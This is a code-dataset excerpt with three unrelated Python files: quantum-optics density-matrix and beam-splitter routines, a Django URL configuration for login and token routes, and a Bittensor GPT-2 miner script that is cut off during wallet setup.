out[i[2], i[0] - i[2], i[3], i[1] - i[3]] = coef(i[2], i[0] - i[2], i[3], i[1] - i[3]) * input_state[i[0], i[1]] * factorial(i[0]) * factorial(i[1])
return out
def detection(input_state, detection_event):
"""
Tranformation of the state with POVM operator.
:param input_state: Applied/unapplied state in 4 channels(modes).
:param detection_event: Detection event.
:return: Applied/unapplied state in 4 channels(modes).
"""
size = len(input_state)
output_state = np.zeros((size,) * 4, dtype=complex)
if detection_event == 'BOTH':
for p1 in range(size):
for p2 in range(size):
for p3 in range(size):
for p4 in range(size):
if p1 is not 0 and p3 is not 0:
output_state[p1, p2, p3, p4] = input_state[p1, p2, p3, p4]
elif detection_event == 'NONE':
for p1 in range(size):
for p2 in range(size):
for p3 in range(size):
for p4 in range(size):
if p1 is 0 and p3 is 0:
output_state[p1, p2, p3, p4] = input_state[p1, p2, p3, p4]
elif detection_event == 'FIRST':
for p1 in range(size):
for p2 in range(size):
for p3 in range(size):
for p4 in range(size):
if p1 > 0 and p3 is 0:
output_state[p1, p2, p3, p4] = input_state[p1, p2, p3, p4]
elif detection_event == 'THIRD':
for p1 in range(size):
for p2 in range(size):
for p3 in range(size):
for p4 in range(size):
if p1 is 0 and p3 is not 0:
output_state[p1, p2, p3, p4] = input_state[p1, p2, p3, p4]
else:
raise ValueError('Wrong configuration')
return output_state
def det_probability(input_state, detection_event):
"""
Calculating a probability of an event realisation.
:param input_state: Unapplied state in 4 channels.
:param detection_event: Detection event.
:return: Probability of the detection.
"""
st_aft_det_unappl = detection(input_state, detection_event)
st_aft_det_conj_app = np.conj(make_state_appliable_4ch(st_aft_det_unappl))
input_state_appl = make_state_appliable_4ch(input_state)
st = np.multiply(input_state_appl, st_aft_det_conj_app)
return np.real(np.sum(st))
def state_norm(state):
"""
A norm of the state.
:param state: Unapplied state in 4 channels.
:return: Norm of the state.
"""
size = len(state)
norm_ = 0
for p1 in range(size):
for p2 in range(size):
for p3 in range(size):
for p4 in range(size):
norm_ = norm_ + abs(state[p1, p2, p3, p4])**2 * factorial(p1)*factorial(p2)*factorial(p3)*factorial(p4)
return sqrt(norm_)
def state_norm_opt(state):
"""
Optimized function for the norm of the state.
:param state: Unapplied state in 4 channels.
:return: Norm of the state.
"""
fact_arr = np.array([factorial(x) for x in range(len(state))])
tf2 = np.tensordot(fact_arr, fact_arr, axes=0)
tf4 = np.tensordot(tf2, tf2, axes=0)
st_abs_quad = np.power(np.abs(state), 2)
mult = np.multiply(st_abs_quad, tf4)
return sqrt(np.sum(mult))
def dens_matrix_with_trace(left_vector, right_vector):
"""
Composing density matrix from projected vectors and partially trace.
:param left_vector: Ket unapplied state in 4 channels.
:param right_vector: Bra unapplied state in 4 channels.
:return: Applied dens matrix for 2 channels.
"""
size = len(left_vector)
if len(left_vector) != len(right_vector):
raise ValueError('Incorrect dimensions')
right_vector_conj = np.conj(right_vector)
dm = np.zeros((size,) * 4, dtype=complex)
for p2 in range(size):
for p2_ in range(size):
for p4 in range(size):
for p4_ in range(size):
matrix_sum = 0
for k1 in range(size):
for k3 in range(size):
matrix_sum = matrix_sum + left_vector[k1, p2, k3, p4] * right_vector_conj[k1, p2_, k3, p4_] * factorial(k1) * factorial(k3) * sqrt(factorial(p2)*factorial(p4)*factorial(p2_)*factorial(p4_))
dm[p2, p4, p2_, p4_] = matrix_sum
return dm
def dens_matrix_with_trace_opt(left_vector, right_vector):
"""
Optimized version.
Composing density matrix from projected vectors and partially trace.
:param left_vector: Ket unapplied state in 4 channels.
:param right_vector: Bra unapplied state in 4 channels.
:return: Applied dens matrix for 2 channels.
"""
size = len(left_vector)
if len(left_vector) != len(right_vector):
raise ValueError('Incorrect dimensions')
right_vector_conj = np.conj(right_vector)
dm = np.zeros((size,) * 4, dtype=complex)
fact_arr = np.array([factorial(x) for x in range(size)])
tf2 = np.tensordot(fact_arr, fact_arr, axes=0)
for p2 in range(size):
for p2_ in range(size):
for p4 in range(size):
for p4_ in range(size):
prod1 = np.multiply(left_vector[:, p2, :, p4], right_vector_conj[:, p2_, :, p4_])
prod2 = prod1 * sqrt(factorial(p2) * factorial(p4) * factorial(p2_) * factorial(p4_))
prod3 = np.multiply(prod2, tf2)
dm[p2, p4, p2_, p4_] = np.sum(prod3)
return dm
def dens_matrix(state):
"""
Build a density matrix in 2 channels.
:param state: Applied state in 2 channels.
:return: Applied density matrix for 2 channels.
"""
size = len(state)
state_conj = np.conj(state)
dm = np.zeros((size,) * 4, dtype=complex)
for p1 in range(size):
for p2 in range(size):
for p1_ in range(size):
for p2_ in range(size):
dm[p1, p2, p1_, p2_] = state[p1, p2] * state_conj[p1_, p2_]
return dm
def dens_matrix_4ch(state):
"""
Build a density matrix in 4 channels.
:param state: Applied state in 4 channels.
:return: Applied density matrix for 4 channels.
"""
size = len(state)
state_conj = np.conj(state)
dens_matrix = np.zeros((size,) * 8, dtype=complex)
for p1 in range(size):
for p2 in range(size):
for p3 in range(size):
for p4 in range(size):
for p1_ in range(size):
for p2_ in range(size):
for p3_ in range(size):
for p4_ in range(size):
dens_matrix[p1, p2, p3, p4, p1_, p2_, p3_, p4_] = state[p1, p2, p3, p4] * state_conj[p1_, p2_, p3_, p4_]
return dens_matrix
def trace_channel(input_matrix, channel=4):
"""
Tracing one channel of density matrix in 2 channels(modes).
:param input_matrix: Applied density matrix in 2 channels.
:param channel: Number of the channel.
:return: Applied reduced density matrix of one channel.
"""
size = len(input_matrix)
reduced_matrix = np.zeros((size, size), dtype=complex)
if channel == 4:
for p2 in range(size):
for p2_ in range(size):
sum = 0
for n in range(size):
sum = sum + input_matrix[p2, n, p2_, n]
reduced_matrix[p2, p2_] = sum
elif channel == 2:
for p4 in range(size):
for p4_ in range(size):
sum = 0
for n in range(size):
sum = sum + input_matrix[n, p4, n, p4_]
reduced_matrix[p4, p4_] = sum
else:
raise ValueError('Invalid configuration')
return reduced_matrix
def bs_densmatrix_transform(input_matrix, t, r):
"""
Beam splitter transformation of density matrix in 2 channels.
Mapping of creation operators:
a2 => t b1 + i r b2.
a4 => t b2 + i r b1.
:param input_matrix: Applied density matrix in 2 channels.
:param t: Transmission coefficient.
:param r: Reflection coefficient.
:return: Applied density matrix in 2 channels.
"""
size = len(input_matrix)
output_matrix = np.zeros((size*2,) * 4, dtype=complex)
for p1 in range(size):
for p2 in range(size):
for p1_ in range(size):
for p2_ in range(size):
for n in range(p1 + 1):
for k in range(p2 + 1):
for n_ in range(p1_ + 1):
for k_ in range(p2_ + 1):
d1 = p1 - n + k
d2 = n + p2 - k
d1_ = p1_ - n_ + k_
d2_ = n_ + p2_ - k_
coeff1 = t**(p1 - n + p2 - k) * (1j*r)**(n + k) * sqrt(factorial(d1) * factorial(d2) * factorial(p1) * factorial(p2)) / (factorial(n) * factorial(p1 - n) * factorial(k) * factorial(p2 - k))
coeff2 = t**(p1_ - n_ + p2_ - k_) * (-1j*r)**(n_ + k_) * sqrt(factorial(d1_) * factorial(d2_) * factorial(p1_) * factorial(p2_)) / (factorial(n_) * factorial(p1_ - n_) * factorial(k_) * factorial(p2_ - k_))
output_matrix[d1, d2, d1_, d2_] = output_matrix[d1, d2, d1_, d2_] + input_matrix[p1, p2, p1_, p2_] * coeff1 * coeff2
return output_matrix
def prob_distr(input_matrix):
"""
Photons distribution probability from final density matrix.
:param input_matrix: Applied density matrix in 2 channels.
:return: Probability distribution for 2 channels.
"""
size = len(input_matrix)
prob_matrix = np.zeros((size, size), dtype=complex)
for m in range(size):
for n in range(size):
prob_matrix[m, n] = input_matrix[m, n, m, n]
return prob_matrix
def log_entropy(dm):
"""
Calculating logarithmic Fon Neuman entropy / entanglement.
:param dm: Applied reduced density matrix.
:return: Entropy.
"""
size = len(dm)
entropy = 0
w, v = np.linalg.eig(dm)
for n in range(size):
if w[n] != 0:
entropy = entropy - w[n] * np.log2(w[n])
return entropy
def partial_transpose(matrix):
"""
Partial transpose of 2 channels density matrix.
:param matrix: Density matrix in 2 channels.
:return: Density matrix in 2 channels.
"""
size = len(matrix)
res_matrix = np.zeros((size,) * 4, dtype=complex)
for p1 in range(size):
for p2 in range(size):
for p1_ in range(size):
for p2_ in range(size):
res_matrix[p1, p2, p1_, p2_] = matrix[p1, p2_, p1_, p2]
return res_matrix
def linear_entropy(dm):
"""
Linear entropy.
:param dm: Reduced density matrix.
:return: Linear entropy.
"""
entropy = 1 - np.trace(dm @ dm)
return entropy
def reorganise_dens_matrix(rho):
"""
Reorganise density matrix in 2 channels:
rho[m, n, m_, n_] ==> rho_out[k, k_].
:param rho: Density matrix in 2 channels.
:return: Reorganised density matrix in two channels.
"""
size = len(rho)
rho_out = np.zeros((size**2,)*2, dtype=complex)
for m in range(size):
for n in range(size):
for m_ in range(size):
for n_ in range(size):
k = m * size + n
k_ = m_ * size + n_
rho_out[k, k_] = rho[m, n, m_, n_]
return rho_out
def negativity(rho, neg_type='logarithmic'):
"""
Calculating negativity for 2 channels.
:param rho: Applied density matrix in 2 channels.
:param neg_type: Negativity type.
:return: Negativity.
"""
part_transposed = partial_transpose(rho)
reorg_rho = reorganise_dens_matrix(part_transposed)
w, v = np.linalg.eig(reorg_rho)
neg = 0
for eigval in w:
if np.real(eigval) < 0:
neg = neg + np.abs(np.real(eigval))
if neg_type == 'logarithmic':
return np.log2(2 * neg + 1)
elif neg_type == 'raw':
return neg
else:
raise ValueError('Incorrect configuration')
def phase_modulation(rho, phase, channel):
"""
A phase modulation for the density matrix in 2 channels.
:param rho: Density matrix in 2 channels.
:param phase: Phase.
:param channe: Channel (1 or 2)
:return: Modulated density matrix in 2 channels.
"""
if phase == 0:
return rho
size = len(rho)
rho_out = np.zeros((size,) * 4, dtype=complex)
if channel == 1:
for p1 in range(size):
for p2 in range(size):
for p1_ in range(size):
for p2_ in range(size):
rho_out[p1, p2, p1_, p2_] = rho[p1, p2, p1_, p2_] * np.exp(1j * phase * (p1 - p1_))
elif channel == 2:
for p1 in range(size):
for p2 in range(size):
for p1_ in range(size):
for p2_ in range(size):
rho_out[p1, p2, p1_, p2_] = rho[p1, p2, p1_, p2_] * np.exp(1j * phase * (p2 - p2_))
else:
raise ValueError('Incorrect configuration')
return rho_out
def phase_modulation_state(state, phase):
"""
A phase modulation for the state in two channels.
:param state: Unapplied state in 2 channels.
:param phase: Phase.
:return: Modulated unapplied state in 2 channels.
"""
size = len(state)
st_mod = np.zeros((size, size), dtype=complex)
for p1 in range(size):
for p2 in range(size):
st_mod[p1, p2] = state[p1, p2] * np.exp(1j * p1 * phase)
return st_mod
def make_state_appliable(state):
"""
Apply operators to the state in 2 channels.
:param state: Unapplied state in 2 channels.
:return: Applied state in 2 channels.
"""
size = len(state)
st_appl = np.zeros((size, size), dtype=complex)
for p1 in range(size):
for p2 in range(size):
st_appl[p1, p2] = state[p1, p2] * sqrt(factorial(p1) * factorial(p2))
return st_appl
def make_state_appliable_4ch(state):
"""
Apply operators to state in 4 channels.
:param state: Unapplied state in 4 channels.
:return: Applied state in 4 channels.
"""
size = len(state)
st_appl = np.zeros((size,)*4, dtype=complex)
for p1 in range(size):
for p2 in range(size):
for p3 in range(size):
for p4 in range(size):
st_appl[p1, p2, p3, p4] = state[p1, p2, p3, p4] * sqrt(factorial(p1) * factorial(p2) * factorial(p3) * factorial(p4))
return st_appl
def bs_parameters(T_min, T_max, num):
"""
Generating BS's t and r parameters arrays.
The step is taken in relation to "big" T coordinate.
:param T_min: T min.
:param T_max: T max.
:param num: length.
:return: BS's t and r small coefficients.
"""
T_array = np.linspace(T_min, T_max, num)
t_array = np.sqrt(T_array)
rf = np.vectorize(lambda t: sqrt(1 - pow(t, 2)))
r_array = rf(t_array)
return t_array, r_array
def bs_parameters_small(t_min, t_max, num):
"""
Generating BS's t and r parameters arrays.
The step is taken in relation to "small" t coordinate.
:param t_min: t min.
:param t_max: t max.
:param num: length.
:return: BS's t and r small coefficients.
"""
t_array = np.linspace(t_min, t_max, num)
rf = np.vectorize(lambda t: sqrt(1 - pow(t, 2)))
r_array = rf(t_array)
return t_array, r_array
|
18,345 | 0000c0c5454229c480bee1bbdafe67c7544ddb48 | from django.urls import path
from . import views
from . views import UsersLoginView
urlpatterns = [
path('register/', views.register),
path('profile/',views.profile),
# path('login/', views.login),
path('login/', UsersLoginView.as_view(), name='obtain_token'),
path('token/refresh/',views.refresh,name='refresh_token'),
# path('token/verify/',MyTokenVerifyView.as_view(),name='verify_token')
# path('token/delete/',TokenCookieDeleteView.as_view(), name='token_delete')
]
|
18,346 | 7607523cc0a0d2be478daeec89a2efcb4be63792 | #!/bin/python3
# The MIT License (MIT)
# Copyright © 2021 Yuma Rao
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the “Software”), to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of
# the Software.
# THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
# THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
""" The Exodus miner.
Example:
$ python miners/text/gpt2_exodus.py
"""
import argparse
import bittensor
import math
import torch
import traceback
import os
import sys
import yaml
from termcolor import colored
from typing import List
from qqdm import qqdm, format_str
from datetime import datetime
from loguru import logger; logger = logger.opt(colors=True)
from types import SimpleNamespace
from nuclei.gpt2 import GPT2Nucleus
from routers.sgmoe import SGMOERouter
from torch.nn.utils import clip_grad_norm_
from tensorboard import program
from torch.utils.tensorboard import SummaryWriter
import bittensor.utils.networking as net
class neuron:
def __init__( self, config: 'bittensor.config' = None ):
r""" Initializes a neuron with the passed config.
"""
if config == None: config = neuron.config()
self.config = config; neuron.check_config( self.config ); print ( self.config )
bittensor.logging (
config = self.config,
logging_dir = self.config.neuron.full_path,
)
self.device = torch.device(
device = self.config.neuron.device
)
self.wallet = bittensor.wallet(
config = self.config
)
self.dendrite = bittensor.dendrite(
config = self.config,
wallet = self.wallet
)
self.subtensor = bittensor.subtensor(
config = self.config
)
self.metagraph = bittensor.metagraph(
config = self.config
)
self.axon = bittensor.axon (
config = self.config,
wallet = self.wallet,
forward_callback = self.forward,
backward_callback = self.backward
)
self.dataset = bittensor.dataloader (
config = self.config
)
self.router = SGMOERouter(
config = self.config
).to( self.device )
self.nucleus = GPT2Nucleus(
config = self.config,
routing_callback = self.route
).to( self.device )
self.optimizer = torch.optim.SGD(
[
{"params": self.router.parameters()},
{"params": self.nucleus.parameters()}
],
lr = self.config.neuron.learning_rate,
weight_decay = self.config.neuron.weight_decay,
)
self.tensorboard = SummaryWriter(
log_dir = self.config.neuron.tensorboard_dir
)
self.mechanism_weights = torch.ones( [0] )
self.epoch = 0
self.global_step = 0
self.epoch_loss = math.inf/2
self.best_epoch_loss = math.inf
@staticmethod
def config() -> 'bittensor.Config':
r""" Fills a config namespace object with defaults or information from the command line.
"""
parser = argparse.ArgumentParser()
parser.add_argument('--neuron.config', type=str, help='If set, defaults are overridden by passed file.')
parser.add_argument('--neuron.modality', type=int, help='''Miner network modality. TEXT=0, IMAGE=1. Currently only allowed TEXT''', default=0)
parser.add_argument('--neuron.use_upnpc', action='store_true', help='''Turns on port forwarding on your router using upnpc.''', default=False)
parser.add_argument('--neuron.use_tensorboard', action='store_true', help='Turn on bittensor logging to tensorboard', default=True)
parser.add_argument('--neuron.learning_rate', type=float, help='Training initial learning rate.', default=3e-2)
parser.add_argument('--neuron.weight_decay', type=float, help='nucleus parameter weight decay.', default=0.25)
parser.add_argument('--neuron.clip_gradients', type=float, help='Implement gradient clipping to avoid exploding loss on smaller architectures.', default=1.0)
parser.add_argument('--neuron.n_epochs', type=int, help='Number of training epochs.', default=sys.maxsize )
parser.add_argument('--neuron.epoch_length', type=int, help='Iterations of training per epoch', default=500)
parser.add_argument('--neuron.batch_size_train', type=int, help='Training batch size.', default=2)
parser.add_argument('--neuron.reload', action='store_true', help='''Reload training from previous trial run.''', default=False )
parser.add_argument('--neuron.restart_on_failure', action='store_true', help='''Restart miner on unknown error.''', default=False)
parser.add_argument('--neuron.compute_remote_gradients', action='store_true', help='''Does the neuron compute and return gradients from backward queries.''', default=False)
parser.add_argument('--neuron.accumulate_remote_gradients', action='store_true', help='''Does the neuron accumulate remote gradients from backward queries.''', default=False)
parser.add_argument('--neuron.name', type=str, help='Trials for this miner go in miner.root / (wallet_cold - wallet_hot) / miner.name ', default='gpt2_exodus')
parser.add_argument('--neuron.device', type=str, help='Neuron default training device cpu/cuda', default=("cuda" if torch.cuda.is_available() else "cpu"))
bittensor.logging.add_args( parser )
bittensor.wallet.add_args( parser )
bittensor.subtensor.add_args( parser )
bittensor.metagraph.add_args( parser )
bittensor.dataloader.add_args( parser )
bittensor.dendrite.add_args( parser )
bittensor.axon.add_args( parser )
GPT2Nucleus.add_args( parser )
SGMOERouter.add_args( parser )
config_file_path = vars(parser.parse_known_args()[0])['neuron.config']
if config_file_path:
#loads config_file and updates defaults
config_file_path = os.path.expanduser(config_file_path)
try:
with open(config_file_path) as f:
params_config = yaml.safe_load(f)
print('Config File Detected at {} updating defaults'.format(config_file_path))
parser.set_defaults(**params_config)
except Exception as e:
print('Error in loading: {} using default parser settings'.format(e))
return bittensor.config( parser )
@staticmethod
def check_config( config: 'bittensor.Config' ):
r""" Checks/validates the config namespace object.
"""
assert config.neuron.batch_size_train > 0, "batch_size_train must be a positive value"
assert config.neuron.learning_rate > 0, "learning_rate must be a positive value."
bittensor.logging.check_config( config )
bittensor.wallet.check_config( config )
bittensor.subtensor.check_config( config )
bittensor.metagraph.check_config( config )
bittensor.dataloader.check_config( config )
bittensor.dendrite.check_config( config )
bittensor.axon.check_config( config )
GPT2Nucleus.check_config( config )
SGMOERouter.check_config( config )
full_path = os.path.expanduser('{}/{}/{}'.format( config.logging.logging_dir, config.wallet.name + "-" + config.wallet.hotkey, config.neuron.name ))
config.neuron.full_path = os.path.expanduser(full_path)
config.neuron.tensorboard_dir = config.neuron.full_path + '/tensorboard-' + '-'.join(str(datetime.now()).split())
if not os.path.exists(config.neuron.full_path):
os.makedirs(config.neuron.full_path)
def __enter__(self):
self.startup()
def __exit__ ( self, exc_type, exc_value, exc_traceback ):
self.shutdown()
def run( self ):
r""" Miner main loop.
"""
# ---- Startup/Shutdown ----
with self:
# ---- Optionally reload from previous run ----
if self.config.neuron.reload:
self.reload()
else:
self.checkpoint()
# --- Run until n_epochs ----
while self.epoch < self.config.neuron.n_epochs:
try:
# ---- Train state ----
self.run_epoch()
# ---- Set weights on chain ----
self.set_mechanism_weights()
# ---- Checkpoint state ----
self.checkpoint()
except KeyboardInterrupt:
# --- User ended session ----
break
except Exception as e:
# --- Unknown error ----
logger.exception('Unknown exception: {} with traceback {}', e, traceback.format_exc())
if self.config.neuron.restart_on_failure == True:
logger.info('Restarting from last saved state.')
self.reload()
else:
break
# --- Run Epoch ----
def run_epoch( self ):
r""" Runs a single training epoch pulled from the dataloader.
"""
# --- Init Epoch ----
total_epoch_loss = 0.0
epoch_batches = self.dataset.dataloader( self.config.neuron.epoch_length )
progress_bar = qqdm(enumerate(epoch_batches), total=len(epoch_batches), desc=format_str('blue', f'Epoch Progress'))
for iteration, (inputs) in progress_bar:
# ---- Forward / Backward ----
prev_mechanism_weights = self.mechanism_weights.tolist()
output = self.train ( batch = { 'inputs': inputs } )
next_mechanism_weights = self.mechanism_weights.tolist()
total_epoch_loss += output.local_target_loss.item()
# ---- Logs ----
self.epoch_logs (
progress_bar,
iteration = iteration,
output = output,
prev_mechanism_weights = prev_mechanism_weights,
next_mechanism_weights = next_mechanism_weights
)
self.global_step += 1
self.epoch_loss = total_epoch_loss / self.config.neuron.epoch_length
self.epoch += 1
# ---- Training call ----
def train ( self, batch: dict ) -> SimpleNamespace:
r""" Runs a single training batch through the nucleus and applies a gradient update.
Args:
batch ( dict, `required`):
training batch dictionary.
Returns:
output = SimpleNamespace (
local_context (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_len, bittensor.__network_dim__)`, `required`):
Representations produced by the nucleus's distillation-model prior to producing the hidden units.
local_hidden (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_len, bittensor.__network_dim__)`, `required`):
Hidden layer representations produced using the local_context.
local_target (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_len, bittensor.__vocab_size__)`, `required`):
GPT2 MLM target predictions produced using local_hidden.
local_target_loss (:obj:`torch.FloatTensor` of shape :obj:`(1)`, `required`):
GPT2 MLM loss computed from the local_target.
remote_context (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_len, bittensor.__network_dim__)`, `required`):
Representations returned from the nucleus.route function after querying the network.
remote_hidden (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_len, bittensor.__network_dim__)`, `required`):
Hidden layer representations produced using the remote_context.
remote_target (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, bittensor.__vocab_size__)`, `required`):
GPT MLM Target predictions produced using remote_hidden.
remote_target_loss (:obj:`torch.FloatTensor` of shape :obj:`(1)`, `required`):
GPT2 MLM loss computed from the remote_target.
distillation_loss (:obj:`torch.FloatTensor` of shape :obj:`(1)`, `required`):
Distillation loss between local_context and remote_context.
)
"""
# ---- Forward pass ----
inputs = batch['inputs']
output = self.nucleus.remote_forward(
inputs = inputs.to( self.device ),
training = True,
)
# ---- Backward pass ----
output.loss = output.local_target_loss + output.distillation_loss + output.remote_target_loss
output.loss.backward() # Accumulates gradients on the nucleus.
clip_grad_norm_(self.nucleus.parameters(), self.config.neuron.clip_gradients)
clip_grad_norm_(self.router.parameters(), self.config.neuron.clip_gradients)
self.optimizer.step() # Applies accumulated gradients.
self.optimizer.zero_grad() # Zeros out gradients for next accummulation
# ---- Update global loss ----
return output
# ---- Axon Forward call ----
def forward ( self, pubkey:str, inputs_x: torch.FloatTensor, modality:int ) -> torch.FloatTensor:
r""" Subscribed to an axon servicing endpoint: processes forward messages from the wire.
The arguments reflect an RPC request from another miner in the network, the response tensor
should be the hidden units computed using the local context and with shape: [batch_size, sequence_len, __network_dim__].
Args:
pubkey ( str, `required`):
The public key of the caller.
inputs_x ( :obj:`torch.Tensor`, `required`):
torch inputs to be forward processed.
modality ( bittensor.proto.Modality, `required`):
modality of inputs e.g. bittensor.proto.Modality.TEXT.
Returns:
outputs (:obj:`torch.FloatTensor`):
The nucleus's outputs as a torch tensor of shape [batch_size, sequence_len, __network_dim__]
"""
inputs_x = inputs_x.to( self.device )
output = self.nucleus.local_forward (
inputs = inputs_x
)
return output.local_hidden
# ---- Axon Backward call ----
def backward ( self, pubkey:str, inputs_x:torch.FloatTensor, grads_dy:torch.FloatTensor, modality:int ) -> torch.FloatTensor:
r""" Subscribed to an axon servicing endpoint: Processes backward messages from the wire.
Arguments reflect an RPC backward request from another miner in the network, the response tensor
should be the gradients of the miner's nucleus w.r.t to the inputs_x and the passed output grads_dy.
Args:
pubkey ( str, `required`):
The public key of the caller.
inputs_x ( :obj:`torch.Tensor`, `required`):
torch inputs from previous forward call.
grads_dy ( :obj:`torch.Tensor`, `required`):
torch grads of forward output.
modality ( bittensor.proto.Modality, `required`):
modality of inputs e.g. bittensor.proto.Modality.TEXT.
Returns:
outputs (:obj:`torch.FloatTensor`, `optional`):
The gradients w.r.t to the inputs [batch_size, sequence_len, -1]
"""
if self.config.neuron.compute_remote_gradients:
with torch.enable_grad():
# ---- Set up inputs for gradient computations.
inputs_x.requires_grad = True
inputs_x = inputs_x.to( self.device )
grads_dy = grads_dy.to( self.device )
outputs_y = self.nucleus.local_forward( inputs = inputs_x ).to( self.device )
# ---- The backward call will accumulate gradients on our parameters.
if self.config.neuron.accumulate_remote_gradients:
torch.autograd.backward (
tensors = [outputs_y],
grad_tensors = [grads_dy]
)
return inputs_x.grad if inputs_x.grad != None else None
# ---- The backward call will simply compute the gradients without accumulating them.
else:
grads_dy = torch.autograd.grad (
outputs = outputs_y,
inputs = inputs_x,
grad_outputs = grads_dy,
only_inputs = True,
create_graph = False,
retain_graph = False
)[0]
return grads_dy
# if ! compute_remote_gradients, NO-OP.
else:
return None
def route ( self, inputs: torch.LongTensor, query: torch.FloatTensor ) -> torch.FloatTensor:
r""" Subscribed to the nucleus. Called during nucleus.remote_forward. Accepts inputs and
a query. Routes inputs through the network to remote neurons based on query.
Args:
inputs (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_dim)`, `required`):
Inputs to send on the wire.
query (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, query_dim)`, `required`):
Query tensor used to selected which neurons to send inputs to.
Returns:
response (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_len, bittensor.__network_dim__)`, `required`):
Joined responses from the network call.
"""
# ---- Forward messages through network ----
outputs = self.router.forward_text( self.metagraph, self.dendrite, inputs, query )
# ---- Train mechanism weights ----
self.mechanism_weights = (1 - 0.1) * self.mechanism_weights + 0.1 * outputs.weights # Moving avg update.
# ---- Return response -----
return outputs.response
def checkpoint( self ):
r""" Optionally Saves, updates and then reloads the miner training state.
"""
last_saved = self.get_saved_state()
if last_saved == None or last_saved['epoch_loss'] >= self.epoch_loss:
self.save()
self.metagraph.load()
self.metagraph.sync()
self.metagraph.save()
self.reload()
def get_saved_state( self ):
r""" Returns a saved state dict or none.
"""
try:
return torch.load("{}/model.torch".format( self.config.neuron.full_path ))
except Exception as e:
logger.exception('Failed to reload model with error: {}', e)
return None
def reload( self ):
r""" Reloads/updates the training state from the disk.
"""
state_dict = self.get_saved_state()
# ---- Load training state.
self.epoch = state_dict['epoch']
self.epoch_loss = state_dict['epoch_loss']
self.global_step = state_dict['global_step']
# ---- Load router and resize to the metagraph size.
self.router.sync_with_chain_state( self.metagraph ) # Resize the router.
self.router.load_state_dict( state_dict['router_state'], strict=False ) # Load router
# ---- Load nucleus and attach the routing function.
self.nucleus.load_state_dict( state_dict['nucleus_state'] ) # Load nucleus
self.nucleus.attach( self )# Re-assign the routing function.
# --- Load optimizer.
optim_groups = [
{"params": self.router.parameters() },
{"params": self.nucleus.parameters() },
]
self.optimizer = torch.optim.SGD(
optim_groups,
lr = state_dict['optimizer_state']['param_groups'][0]['lr'],
weight_decay = state_dict['optimizer_state']['param_groups'][0]['weight_decay'],
)
# ---- Load mechanism weights and pad to size.
self.mechanism_weights = state_dict['mechanism_weights']
self.mechanism_weights = torch.nn.functional.pad (
self.mechanism_weights,
pad = [0, self.metagraph.n - self.mechanism_weights.numel()],
value=0
)
bittensor.logging.success( prefix = 'Reloaded model', sufix = '<blue>{}/model.torch</blue>'.format( self.config.neuron.full_path ))
def save( self ):
r""" Saves the training state to disk.
"""
try:
state_dict = {
'epoch': self.epoch,
'epoch_loss': self.epoch_loss,
'global_step': self.global_step,
'mechanism_weights': self.mechanism_weights, # Save row.
'router_state': self.router.state_dict(), # Save router state.
'nucleus_state': self.nucleus.state_dict(), # Save nucleus state.
'optimizer_state': self.optimizer.state_dict(), # Save optimizer.
}
torch.save( state_dict, "{}/model.torch".format( self.config.neuron.full_path, self.epoch_loss ) )
bittensor.logging.success(prefix='Saved model', sufix='<blue>{}/model.torch</blue>'.format( self.config.neuron.full_path ) )
except Exception as e:
logger.exception('Failed to save model with error:{}', e)
def set_mechanism_weights( self ):
r""" Sets the mechanism weights on chain.
"""
try:
uids = self.metagraph.uids
did_set = self.subtensor.set_weights(
wallet = self.wallet,
uids = uids,
weights = self.mechanism_weights,
wait_for_inclusion = True
)
if did_set:
logger.success('Set weights:'.ljust(20) + '{}', self.mechanism_weights.tolist())
else:
logger.warning('Failed to set weights on chain.')
self.subtensor = bittensor.subtensor( config = self.config.subtensor )
self.subtensor.connect()
except Exception as e:
logger.error('Failure setting weights on chain with error: {}', e)
def startup( self ):
r""" Starts and subscribes the miner.
"""
# ---- Setup UPNPC ----
if self.config.neuron.use_upnpc:
bittensor.logging.success(prefix = 'Set upnpc', sufix = '<green>ON</green>')
try:
self.external_port = net.upnpc_create_port_map( port = self.axon.port )
except net.UPNPCException as upnpc_exception:
logger.critical('Failed to hole-punch with upnpc')
raise RuntimeError('Failed to hole-punch with upnpc')
else:
bittensor.logging.success(prefix = 'Set upnpc', sufix = '<red>OFF</red>')
self.external_port = self.config.axon.port
# ---- Get external ip ----
try:
self.external_ip = net.get_external_ip()
bittensor.logging.success(prefix = 'External IP', sufix = '<blue>{}</blue>'.format(self.external_ip))
except net.ExternalIPNotFound as external_port_exception:
raise RuntimeError('Unable to attain your external ip. Check your internet connection. error:{}', external_port_exception)
# ---- Setup tensorboard ----
if self.config.neuron.use_tensorboard == True:
self._tensorboard_program = program.TensorBoard()
self._tensorboard_program.configure(argv=[None, '--logdir', self.config.neuron.full_path, '--load_fast=true'])
self._tensorbaord_url = self._tensorboard_program.launch()
bittensor.logging.success(prefix = 'Set tensorboard', sufix = '<blue>http://localhost:6006/</blue>')
else: bittensor.logging.success(prefix = 'Set tensorboard', sufix = '<red>OFF</red>')
# ---- Setup Wallet. ----
if not self.wallet.has_coldkeypub:
self.wallet.create_new_coldkey( n_words = 12, use_password = True )
if not self.wallet.has_coldkeypub:
raise RuntimeError('Miner must have access to a decrypted coldkeypub')
if not self.wallet.has_hotkey:
